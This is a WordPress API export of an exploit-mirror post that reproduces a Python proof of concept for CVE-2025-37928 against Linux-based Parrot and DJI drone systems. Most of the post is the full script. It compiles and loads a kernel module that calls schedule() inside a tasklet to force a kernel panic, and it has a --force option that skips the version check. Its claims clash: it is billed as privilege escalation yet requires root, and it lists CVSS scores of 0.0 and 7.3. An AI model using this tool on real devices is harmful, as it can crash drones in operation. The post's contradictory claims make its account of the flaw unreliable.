{"id":6870,"date":"2025-06-15T09:43:15","date_gmt":"2025-06-15T09:43:15","guid":{"rendered":"http:\/\/localhost\/?p=6870"},"modified":"2025-06-15T09:43:15","modified_gmt":"2025-06-15T09:43:15","slug":"parrot-and-dji-variants-drone-oses-kernel-panic-exploit","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=6870","title":{"rendered":"Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52329<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-15T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-06-15T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">0.0<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #666666; font-weight: bold;\">NONE<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">NONE<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-37928<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n!\/usr\/bin\/env python3 Exploit Title: Parrot and DJI variants Drone OSes &#8211; Kernel&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n#!\/usr\/bin\/env python3<br \/>\n<br \/># Exploit Title: Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit<br \/>\n<br \/># Author: Mohammed Idrees Banyamer<br \/>\n<br \/># Instagram: @banyamer_security<br \/>\n<br \/># GitHub: https:\/\/github.com\/mbanyamer<br \/>\n<br \/># Date: 2025-06-10<br \/>\n<br \/># Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M<br \/>\n<br \/># CVE: CVE-2025-37928<br \/>\n<br \/># Type: Local Privilege Escalation \/ Kernel Panic<br \/>\n<br \/># Platform: Linux-based drone OS (Parrot and DJI variants)<br \/>\n<br \/># Author Country: Jordan<br \/>\n<br \/># CVSS v3.1 Score: 7.3 (Important)<br \/>\n<br \/># Weakness: CWE-284: Improper Access Control<br \/>\n<br \/># Attack Vector: Local<br \/>\n<br \/># User Interaction: None<br \/>\n<br \/># Scope: Unchanged<br \/>\n<br \/># Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)<br \/>\n<br \/># Exploit Code Maturity: Proof of Concept<br \/>\n<br \/># Remediation Level: Official Fix Available<br \/>\n<br \/>#<br \/>\n<br \/># Description:<br \/>\n<br \/># This PoC triggers a kernel panic by calling schedule() inside an atomic context,<br \/>\n<br \/># exploiting CVE-2025-37928 present in certain Linux kernels running on<br \/>\n<br \/># Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.<br \/>\n<br \/>#<br \/>\n<br \/># Steps of exploitation:<br \/>\n<br \/># 1. Check if running as root.<br \/>\n<br \/># 2. Verify kernel version vulnerability.<br \/>\n<br \/># 3. Detect drone type from system files.<br \/>\n<br \/># 4. Build and load vulnerable kernel module.<br \/>\n<br \/># 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.<br \/>\n<br \/>#<br \/>\n<br \/># Affected Drone Versions:<br \/>\n<br \/># &#8211; Parrot QRD<br \/>\n<br \/># &#8211; Parrot Alpha-M (DT)<br \/>\n<br \/># &#8211; DJI QRD<br \/>\n<br \/># &#8211; DJI Alpha-M (DT)<br \/>\n<br \/>#<br \/>\n<br \/># &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\n<br \/>#  Usage:<br \/>\n<br \/>#   sudo python3 cve_2025_37928_tool.py [OPTIONS]<br \/>\n<br \/>#<br \/>\n<br \/>#  Options:<br \/>\n<br \/>#   &#8211;dry-run         Run detection &#038; build only (no module loading)<br \/>\n<br \/>#   &#8211;force           Force exploit even if kernel not detected as vulnerable<br \/>\n<br \/>#   &#8211;cleanup-only    Remove the kernel module without triggering panic<br \/>\n<br \/>#   &#8211;verbose         Enable detailed logging and debug output<br \/>\n<br \/>#   &#8211;help            Show usage information<br \/>\n<br \/>#<br \/>\n<br \/>#  Examples:<br \/>\n<br \/>#   sudo python3 cve_2025_37928_tool.py &#8211;dry-run<br \/>\n<br \/>#   sudo python3 cve_2025_37928_tool.py<br \/>\n<br \/>#   sudo python3 cve_2025_37928_tool.py &#8211;force<br \/>\n<br \/>#   sudo python3 cve_2025_37928_tool.py &#8211;cleanup-only<br \/>\n<br \/>#<br \/>\n<br \/>#  Warning:<br \/>\n<br \/>#   This PoC causes an immediate kernel panic.<br \/>\n<br \/>#   Use it ONLY in isolated and controlled environments (e.g., lab tests).<br \/>\n<br \/># &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p>import os<br \/>\n<br \/>import sys<br \/>\n<br \/>import subprocess<br \/>\n<br \/>import tempfile<br \/>\n<br \/>import argparse<br \/>\n<br \/>import shutil<br \/>\n<br \/>import platform<\/p>\n<p>MODULE_NAME = &#8220;cve_2025_37928_poc&#8221;<br \/>\n<br \/>C_FILENAME = MODULE_NAME + &#8220;.c&#8221;<br \/>\n<br \/>KO_FILENAME = MODULE_NAME + &#8220;.ko&#8221;<\/p>\n<p>KERNEL_MODULE_CODE = r&#8221;&#8217;<br \/>\n<br \/>#include <linux\/module.h>\n<br \/>#include <linux\/kernel.h>\n<br \/>#include <linux\/init.h>\n<br \/>#include <linux\/interrupt.h>\n<br \/>#include <linux\/sched.h>\n<p>MODULE_LICENSE(&#8220;GPL&#8221;);<br \/>\n<br \/>MODULE_AUTHOR(&#8220;PoC Author&#8221;);<br \/>\n<br \/>MODULE_DESCRIPTION(&#8220;PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic&#8221;);<\/p>\n<p>static void trigger_panic_tasklet(unsigned long data)<br \/>\n<br \/>{<br \/>\n<br \/>    pr_alert(&#8220;[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\\n&#8221;);<br \/>\n<br \/>    schedule(); \/\/ This causes kernel panic<br \/>\n<br \/>}<\/p>\n<p>DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);<\/p>\n<p>static int __init poc_init(void)<br \/>\n<br \/>{<br \/>\n<br \/>    pr_info(&#8220;[CVE-2025-37928] Loading PoC module and scheduling tasklet&#8230;\\n&#8221;);<br \/>\n<br \/>    tasklet_schedule(&#038;my_tasklet);<br \/>\n<br \/>    return 0;<br \/>\n<br \/>}<\/p>\n<p>static void __exit poc_exit(void)<br \/>\n<br \/>{<br \/>\n<br \/>    tasklet_kill(&#038;my_tasklet);<br \/>\n<br \/>    pr_info(&#8220;[CVE-2025-37928] PoC module unloaded\\n&#8221;);<br \/>\n<br \/>}<\/p>\n<p>module_init(poc_init);<br \/>\n<br \/>module_exit(poc_exit);<br \/>\n<br \/>&#8221;&#8217;<\/p>\n<p>MAKEFILE_CONTENT = f&#8221;&#8217;<br \/>\n<br \/>obj-m += {MODULE_NAME}.o<\/p>\n<p>all:<br \/>\n<br \/>\\tmake -C \/lib\/modules\/$(shell uname -r)\/build M=$(PWD) modules<\/p>\n<p>clean:<br \/>\n<br \/>\\tmake -C \/lib\/modules\/$(shell uname -r)\/build M=$(PWD) clean<br \/>\n<br \/>&#8221;&#8217;<\/p>\n<p>def check_root():<br \/>\n<br \/>    if os.geteuid() != 0:<br \/>\n<br \/>        print(&#8220;[-] Must be run as root.&#8221;)<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>def detect_kernel():<br \/>\n<br \/>    version = platform.release()<br \/>\n<br \/>    vulnerable_versions = [&#8220;5.10&#8221;, &#8220;5.15&#8221;, &#8220;6.0&#8221;]<br \/>\n<br \/>    vulnerable = any(v in version for v in vulnerable_versions)<br \/>\n<br \/>    print(f&#8221;[i] Kernel version: {version} => {&#8216;VULNERABLE&#8217; if vulnerable else &#8216;UNKNOWN\/SAFE&#8217;}&#8221;)<br \/>\n<br \/>    return vulnerable<\/p>\n<p>def detect_drone_type():<br \/>\n<br \/>    print(&#8220;[*] Detecting drone type&#8230;&#8221;)<br \/>\n<br \/>    files = [&#8220;\/etc\/drone_type&#8221;, &#8220;\/proc\/device-tree\/model&#8221;, &#8220;\/sys\/firmware\/devicetree\/base\/model&#8221;]<br \/>\n<br \/>    found = []<br \/>\n<br \/>    for path in files:<br \/>\n<br \/>        if os.path.exists(path):<br \/>\n<br \/>            try:<br \/>\n<br \/>                with open(path, &#8220;r&#8221;) as f:<br \/>\n<br \/>                    content = f.read().strip()<br \/>\n<br \/>                    if any(x in content for x in [&#8220;Parrot&#8221;, &#8220;DJI&#8221;]):<br \/>\n<br \/>                        found.append(content)<br \/>\n<br \/>            except:<br \/>\n<br \/>                continue<br \/>\n<br \/>    if found:<br \/>\n<br \/>        for d in found:<br \/>\n<br \/>            print(f&#8221;  [i] Found: {d}&#8221;)<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(&#8221;  [!] No drone ID found.&#8221;)<br \/>\n<br \/>    return found<\/p>\n<p>def write_module(tempdir):<br \/>\n<br \/>    c_path = os.path.join(tempdir, C_FILENAME)<br \/>\n<br \/>    makefile_path = os.path.join(tempdir, &#8220;Makefile&#8221;)<br \/>\n<br \/>    with open(c_path, &#8220;w&#8221;) as f:<br \/>\n<br \/>        f.write(KERNEL_MODULE_CODE)<br \/>\n<br \/>    with open(makefile_path, &#8220;w&#8221;) as f:<br \/>\n<br \/>        f.write(MAKEFILE_CONTENT)<br \/>\n<br \/>    return c_path<\/p>\n<p>def build_module(tempdir):<br \/>\n<br \/>    print(&#8220;[*] Building module&#8230;&#8221;)<br \/>\n<br \/>    result = subprocess.run([&#8220;make&#8221;], cwd=tempdir, capture_output=True, text=True)<br \/>\n<br \/>    if result.returncode != 0:<br \/>\n<br \/>        print(&#8220;[-] Build failed:\\n&#8221;, result.stderr)<br \/>\n<br \/>        sys.exit(1)<br \/>\n<br \/>    print(&#8220;[+] Build successful.&#8221;)<br \/>\n<br \/>    return os.path.join(tempdir, KO_FILENAME)<\/p>\n<p>def load_module(ko_path):<br \/>\n<br \/>    print(&#8220;[*] Loading kernel module&#8230;&#8221;)<br \/>\n<br \/>    result = subprocess.run([&#8220;insmod&#8221;, ko_path], capture_output=True, text=True)<br \/>\n<br \/>    if result.returncode != 0:<br \/>\n<br \/>        print(&#8220;[-] insmod failed:\\n&#8221;, result.stderr)<br \/>\n<br \/>        sys.exit(1)<br \/>\n<br \/>    print(&#8220;[!] Module loaded. Kernel panic should occur if vulnerable.&#8221;)<\/p>\n<p>def unload_module():<br \/>\n<br \/>    print(&#8220;[*] Attempting to remove module&#8230;&#8221;)<br \/>\n<br \/>    subprocess.run([&#8220;rmmod&#8221;, MODULE_NAME], stderr=subprocess.DEVNULL)<br \/>\n<br \/>    print(&#8220;[+] Module removal attempted.&#8221;)<\/p>\n<p>def clean_build(tempdir):<br \/>\n<br \/>    subprocess.run([&#8220;make&#8221;, &#8220;clean&#8221;], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)<\/p>\n<p>def main():<br \/>\n<br \/>    parser = argparse.ArgumentParser(description=&#8221;CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;&#8211;dry-run&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Only simulate and check environment, no exploitation&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;&#8211;force&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Force execution even if version unknown&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;&#8211;cleanup-only&#8221;, action=&#8221;store_true&#8221;, help=&#8221;Just remove kernel module if loaded&#8221;)<\/p>\n<p>    args = parser.parse_args()<br \/>\n<br \/>    check_root()<\/p>\n<p>    if args.cleanup_only:<br \/>\n<br \/>        unload_module()<br \/>\n<br \/>        return<\/p>\n<p>    vulnerable = detect_kernel()<br \/>\n<br \/>    detect_drone_type()<\/p>\n<p>    if not vulnerable and not args.force:<br \/>\n<br \/>        print(&#8220;[-] Kernel not identified as vulnerable. Use &#8211;force to override.&#8221;)<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>    if args.dry_run:<br \/>\n<br \/>        print(&#8220;[*] Dry run mode. Exiting before exploitation.&#8221;)<br \/>\n<br \/>        return<\/p>\n<p>    with tempfile.TemporaryDirectory() as tempdir:<br \/>\n<br \/>        print(f&#8221;[*] Working directory: {tempdir}&#8221;)<br \/>\n<br \/>        write_module(tempdir)<br \/>\n<br \/>        ko_path = build_module(tempdir)<\/p>\n<p>        try:<br \/>\n<br \/>            load_module(ko_path)<br \/>\n<br \/>        except KeyboardInterrupt:<br \/>\n<br \/>            print(&#8220;[!] Interrupted. Attempting cleanup&#8230;&#8221;)<br \/>\n<br \/>        finally:<br \/>\n<br \/>            unload_module()<br \/>\n<br \/>            clean_build(tempdir)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52329\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit Exploit ID EDB-ID:52329 Type exploitdb Published 2025-06-15T00:00:00 Modified 2025-06-15T00:00:00&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,34,12,40,13,33,7,11,5],"class_list":["post-6870","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-00","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Parrot and DJI variants Drone OSes - Kernel Panic Exploit - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6870\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Parrot and DJI variants Drone OSes - Kernel Panic Exploit - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit Exploit ID EDB-ID:52329 Type exploitdb Published 2025-06-15T00:00:00 Modified 2025-06-15T00:00:00...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6870\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-15T09:43:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6870#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6870\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit\",\"datePublished\":\"2025-06-15T09:43:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6870\"},\"wordCount\":954,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-0.0\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6870#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6870\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6870\",\"name\":\"Parrot and DJI variants Drone OSes - Kernel Panic Exploit - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-06-15T09:43:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6870#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6870\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6870#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Parrot and DJI variants Drone OSes - Kernel Panic Exploit - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6870","og_locale":"en_US","og_type":"article","og_title":"Parrot and DJI variants Drone OSes - Kernel Panic Exploit - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit Exploit ID EDB-ID:52329 Type exploitdb Published 2025-06-15T00:00:00 Modified 2025-06-15T00:00:00...","og_url":"https:\/\/zero.redgem.net\/?p=6870","og_site_name":"zero redgem","article_published_time":"2025-06-15T09:43:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6870#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6870"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit","datePublished":"2025-06-15T09:43:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6870"},"wordCount":954,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-0.0","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6870#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6870","url":"https:\/\/zero.redgem.net\/?p=6870","name":"Parrot and DJI variants Drone OSes - Kernel Panic Exploit - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-06-15T09:43:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6870#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6870"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6870#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Parrot and DJI variants Drone OSes &#8211; Kernel Panic Exploit"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6870","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6870"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6870\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6870"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6870"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6870"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}